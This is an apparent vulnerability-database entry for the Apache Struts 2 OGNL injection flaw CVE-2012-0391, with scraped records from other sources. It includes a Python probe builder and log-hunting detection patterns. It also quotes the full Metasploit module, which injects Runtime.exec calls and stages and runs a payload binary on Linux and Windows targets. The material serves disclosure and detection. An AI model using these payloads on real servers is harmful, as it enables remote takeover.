## Apache Struts 2 ConversionErrorInterceptor Java Injection
Reporter: SAINT Corporation
Added: 08/02/2012
CVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>)
OSVDB: [78277](<http://www.osvdb.org/78277>)
CVSS v2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
### Background
Apache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture.
### Problem
Struts 2 uses the Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 mishandle the conversion error raised when a request parameter cannot be converted to the type of the property it is assigned to (for example, a non-numeric string supplied for an integer field). If such a type conversion error occurs, the rejected parameter value is interpreted as an OGNL expression rather than as a plain string, which allows a remote, unauthenticated attacker to execute arbitrary Java code on the server via a crafted parameter.
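The following Python script is an added example, not SAINT's exploit and not code from the Struts project. It shows the three pieces a practitioner usually needs around this bug: building a probe of the shape used by the public Metasploit and Nessus checks for CVE-2012-0391 (the `#_memberAccess` override is needed because OGNL's default member access policy refuses static method calls), recognising the `java.lang.UNIXProcess@…`/`java.lang.ProcessImpl@…` string that a vulnerable Struts 2 echoes back into the re-rendered form field after evaluating the expression, and hunting for attempts in web server access logs. The action path `/HelloWorldStruts2/hello.action`, the parameter names `name` and `id`, and the sample log lines and responses are constructed assumptions for the demonstration.

```python
import re
from urllib.parse import quote, unquote, urlencode

# Probe expression of the shape used by the public Metasploit and Nessus checks for
# CVE-2012-0391. The leading quote closes the string literal that Struts builds around
# the rejected parameter value, the parenthesised OGNL runs, and the trailing +' keeps
# the whole expression syntactically valid so it is evaluated rather than rejected.
def build_ognl_probe(cmd: str) -> str:
    return ("'+(#_memberAccess[\"allowStaticMethodAccess\"]=true,"
            "@java.lang.Runtime@getRuntime().exec('" + cmd + "'))+'")


def build_probe_url(action_path: str, params: dict, target_param: str, cmd: str = "id") -> str:
    """Return a GET request target with `target_param` replaced by the probe.

    `target_param` must be bound to a non-String property (e.g. an int field) so the
    conversion fails. Action path and parameter names here are hypothetical.
    """
    query = dict(params)
    query[target_param] = build_ognl_probe(cmd)
    return action_path + "?" + urlencode(query, quote_via=quote)


# On a vulnerable Struts 2 the re-rendered form carries the evaluated expression:
# Runtime.exec() returns a Process whose toString() is java.lang.UNIXProcess@<hash>
# (Linux) or java.lang.ProcessImpl@<hash> (Windows), which the public checks look for.
PROCESS_MARKER = re.compile(r'java\.lang\.(?:UNIX)?Process(?:Impl)?@[0-9a-fA-F]+')


def response_shows_execution(body: str) -> bool:
    return PROCESS_MARKER.search(body) is not None


# Indicators for hunting exploitation attempts in web server access logs.
OGNL_INDICATORS = {
    "member_access_override": re.compile(r"#_memberAccess\b"),
    "static_method_access": re.compile(r"allowStaticMethodAccess"),
    "runtime_exec": re.compile(r"@java\.lang\.Runtime@getRuntime\(\)"),
    "process_builder": re.compile(r"@java\.lang\.ProcessBuilder@"),
}
ACCESS_LOG_REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def deep_unquote(s: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads (%2527 -> %27 -> ') are seen."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_ognl_injection(log_line: str) -> list:
    """Names of the indicators present in the request target of one access-log line.

    Only the request line is visible in a combined-format log, so POST bodies
    (which Struts evaluates just the same) must be inspected at the proxy or WAF.
    """
    m = ACCESS_LOG_REQUEST.search(log_line)
    if not m:
        return []
    target = deep_unquote(m.group(1))
    return [name for name, rx in OGNL_INDICATORS.items() if rx.search(target)]


def scan_log(lines) -> list:
    """Return (line_number, indicators) for every line that carries an indicator."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_ognl_injection(line)
        if found:
            hits.append((n, found))
    return hits


# Constructed sample data (not captured from a real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Aug/2012:10:15:02 +0000] "GET /HelloWorldStruts2/hello.action'
    '?name=test&id=%27%2B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue'
    '%2C%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29%29%2B%27 HTTP/1.1" 200 2311',
    '10.0.0.7 - - [02/Aug/2012:10:15:09 +0000] "GET /HelloWorldStruts2/hello.action'
    '?name=alice&id=42 HTTP/1.1" 200 1187',
]
SAMPLE_RESPONSE_HIT = '<input type="text" name="id" value="java.lang.UNIXProcess@1a2b3c" id="hello_id"/>'
SAMPLE_RESPONSE_MISS = '<input type="text" name="id" value="42" id="hello_id"/>'

if __name__ == "__main__":
    print(build_probe_url("/HelloWorldStruts2/hello.action", {"name": "test"}, "id"))
    print(response_shows_execution(SAMPLE_RESPONSE_HIT), response_shows_execution(SAMPLE_RESPONSE_MISS))
    print(scan_log(SAMPLE_LOG))
```

Run it as a script to print the probe URL, the marker check on the two sample responses, and the log hits. A benign command such as `id` or `ipconfig` is enough for a safe check, because the evidence is the `Process` object echoed into the page rather than the command's output; the log indicators are deliberately decoded before matching so that single- or double-percent-encoded attempts are not missed.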
### Resolution
Upgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later.
### References
<http://struts.apache.org/2.x/docs/version-notes-2311.html>
<https://issues.apache.org/jira/browse/WW-3668>
<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt>
### Limitations
This exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut).
The executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The SMB password must not contain single quotes (').
### Platforms
Windows
{"id": "SAINT:7BC59B3330A7820A216EA06973B8F0C8", "vendorId": null, "type": "saint", "bulletinFamily": "exploit", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). 
\n\n### Platforms\n\nWindows \n \n\n", "published": "2012-08-02T00:00:00", "modified": "2012-08-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2012-0391"], "immutableFields": [], "lastseen": "2021-07-29T16:40:11", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:31890548-3E0B-40EF-84B2-B9CBDC95596A"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-120"]}, {"type": "cisa", "idList": ["CISA:84B5063678E22C88DCF150A265C078F7"]}, {"type": "cve", "idList": ["CVE-2012-0391"]}, {"type": "d2", "idList": ["D2SEC_STRUTS2"]}, {"type": "f5", "idList": ["F5:K20127031"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS_CODE_EXEC_EXCEPTION_DELEGATOR"]}, {"type": "nessus", "idList": ["STRUTS_EXCEPTIONDELEGATOR_COMMAND_EXECUTION.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113272"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "saint", "idList": ["SAINT:46C06C664B1E5C691A77B2FC04327D68", "SAINT:4B122F6299581540A8429BAA06656ACE", "SAINT:7B263B551E3799A3C795713D657E1BD2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2012-0391"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851"]}], "rev": 4}, "score": {"value": 
0.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:31890548-3E0B-40EF-84B2-B9CBDC95596A"]}, {"type": "cve", "idList": ["CVE-2012-0391"]}, {"type": "d2", "idList": ["D2SEC_STRUTS2"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS_CODE_EXEC_EXCEPTION_DELEGATOR"]}, {"type": "nessus", "idList": ["STRUTS_EXCEPTIONDELEGATOR_COMMAND_EXECUTION.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113272"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "saint", "idList": ["SAINT:46C06C664B1E5C691A77B2FC04327D68"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2012-0391"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851"]}]}, "exploitation": null, "vulnersScore": 0.9}, "_state": {"dependencies": 1647887093, "score": 1659770509}}
{"saint": [{"lastseen": "2022-01-26T11:36:04", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). 
\n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "saint", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-08-02T00:00:00", "id": "SAINT:46C06C664B1E5C691A77B2FC04327D68", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:57", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. 
\n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "saint", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0391"], "modified": "2012-08-02T00:00:00", "id": "SAINT:7B263B551E3799A3C795713D657E1BD2", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:41", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. 
\n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "saint", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-08-02T00:00:00", "id": "SAINT:4B122F6299581540A8429BAA06656ACE", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:59", "description": "", "cvss3": {}, "published": "2012-06-05T00:00:00", "type": "packetstorm", "title": "Apache Struts 2.2.1.1 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": 
["CVE-2012-0391"], "modified": "2012-06-05T00:00:00", "id": "PACKETSTORM:113272", "href": "https://packetstormsecurity.com/files/113272/Apache-Struts-2.2.1.1-Remote-Command-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::CmdStagerTFTP \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts <= 2.2.1.1 Remote Command Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in \nApache Struts versions < 2.2.1.1. This issue is caused because the \nExceptionDelegator interprets parameter values as OGNL expressions \nduring certain exception handling for mismatched data types of properties, \nwhich allows remote attackers to execute arbitrary Java code via a \ncrafted parameter. 
\n}, \n'Author' => \n[ \n'Johannes Dahse', # Vulnerability discovery and PoC \n'Andreas Nusser', # Vulnerability discovery and PoC \n'juan vazquez', # Metasploit module \n'sinn3r' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: $', \n'References' => \n[ \n[ 'CVE', '2012-0391'], \n[ 'OSVDB', '78277'], \n[ 'EDB', '18329'], \n[ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt'] \n], \n'Platform' => [ 'win', 'linux'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n], \n'DisclosureDate' => 'Jan 06 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', \"\"]), \nOptString.new('CMD', [ false, 'Execute this command instead of using command stager', \"\" ]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \n \nuri = String.new(datastore['TARGETURI']) \nuri.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\"))%2b'\") if target['Platform'] == 'win' \nuri.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\".split(\\\"@\\\")))%2b'\") if target['Platform'] == 'linux' \nuri.gsub!(/CMD/, Rex::Text::uri_encode(cmd)) \n \nvprint_status(\"Attempting to execute: #{cmd}\") \n \nresp = send_request_raw({ \n'uri' => uri, \n'version' => '1.1', \n'method' => 'GET', \n}, 5) \n \nend \n \ndef windows_stager \nexe_fname = rand_text_alphanumeric(4+rand(4)) + \".exe\" \n \nprint_status(\"Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}\") \nexecute_cmdstager({ :temp => '.'}) \n@payload_exe = 
payload_exe \n \nprint_status(\"Attempting to execute the payload...\") \nexecute_command(@payload_exe) \nend \n \ndef linux_stager \ncmds = \"/bin/sh@-c@echo LINE | tee FILE\" \nexe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) \nbase64 = Rex::Text.encode_base64(exe) \nbase64.gsub!(/\\=/, \"\\\\u003d\") \nfile = rand_text_alphanumeric(4+rand(4)) \n \nexecute_command(\"/bin/sh@-c@touch /tmp/#{file}.b64\") \ncmds.gsub!(/FILE/, \"/tmp/\" + file + \".b64\") \nbase64.each_line do |line| \nline.chomp! \ncmd = cmds \ncmd.gsub!(/LINE/, line) \nexecute_command(cmds) \nend \n \nexecute_command(\"/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@chmod +x /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@rm /tmp/#{file}.b64\") \n \nexecute_command(\"/bin/sh@-c@/tmp/#{file}\") \n@payload_exe = \"/tmp/\" + file \nend \n \ndef on_new_session(client) \nif target['Platform'] == 'linux' \nprint_status(\"Deleting #{@payload_exe} payload file\") \nexecute_command(\"/bin/sh@-c@rm #{@payload_exe}\") \nelse \nprint_status(\"Windows does not allow running executables to be deleted\") \nprint_status(\"Delete the #{@payload_exe} file manually after migrating\") \nend \nend \n \ndef exploit \nif not datastore['CMD'].empty? \nprint_status(\"Executing user supplied command\") \nexecute_command(datastore['CMD']) \nreturn \nend \n \ncase target['Platform'] \nwhen 'linux' \nlinux_stager \nwhen 'win' \nwindows_stager \nelse \nraise RuntimeError, 'Unsupported target platform!' 
\nend \n \nhandler \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113272/struts_code_exec_exception_delegator.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:31:26", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets\nparameter values as OGNL expressions during certain exception handling for\nmismatched data types of properties, which allows remote attackers to\nexecute arbitrary Java code via a crafted parameter.\n\n#### Bugs\n\n * <https://issues.apache.org/jira/browse/WW-3668>\n", "cvss3": {}, "published": "2012-01-08T00:00:00", "type": "ubuntucve", "title": "CVE-2012-0391", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-01-08T00:00:00", "id": "UB:CVE-2012-0391", "href": "https://ubuntu.com/security/CVE-2012-0391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-08-02T18:51:18", "description": "A script injection vulnerability has been reported in Apache Struts 2.", "cvss3": {}, "published": "2012-04-16T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts 2 ConversionErrorInterceptor OGNL Script Injection (CVE-2012-0391)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0391"], "modified": "2022-08-02T00:00:00", "id": "CPAI-2012-120", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], 
"cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "The ExceptionDelegator component in Apache Struts 2 before 2.2.3.1 contains an improper input validation vulnerability which allows for remote code execution.", "cvss3": {}, "published": "2022-01-21T00:00:00", "type": "cisa_kev", "title": "Apache Struts 2 Improper Input Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2022-01-21T00:00:00", "id": "CISA-KEV-CVE-2012-0391", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:38:20", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.", "cvss3": {}, "published": "2012-01-08T15:55:00", "type": "cve", "title": "CVE-2012-0391", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2012-0391"], "modified": "2018-11-23T14:36:00", "cpe": [], "id": "CVE-2012-0391", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}], "d2": [{"lastseen": "2021-07-28T14:32:19", "description": "**Name**| d2sec_struts2 \n---|--- \n**CVE**| CVE-2012-0391 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_struts2 \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2012-01-08T15:55:00", "title": "DSquare Exploit Pack: D2SEC_STRUTS2", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-01-08T15:55:00", "id": "D2SEC_STRUTS2", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_struts2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2022-02-01T00:00:00", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter. ([CVE-2012-0391](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>))\n\nImpact\n\nNo F5 products are affected by this vulnerability in default, standard, or recommended configurations. 
BIG-IP AAM is affected by this vulnerability only if the Apache Struts configuration has been deliberately configured to enable Development Mode (devMode). devMode is disabled by default on BIG-IP AAM. BIG-IP AAM 16.0.0 and later are not vulnerable, regardless of the Apache Struts configuration.\n", "cvss3": {}, "published": "2020-12-11T21:24:00", "type": "f5", "title": "Apache Struts vulnerability CVE-2012-0391", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2020-12-11T21:24:00", "id": "F5:K20127031", "href": "https://support.f5.com/csp/article/K20127031", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-12T15:49:06", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to an error in the way that the ExceptionDelegator component handles mismatched data types, an unauthenticated, remote attacker can execute arbitrary commands on the remote host by sending a specially crafted request order. This flaw is due to the ExceptionDelegator interpreting parameter values as OGNL expressions when there is a conversion error. 
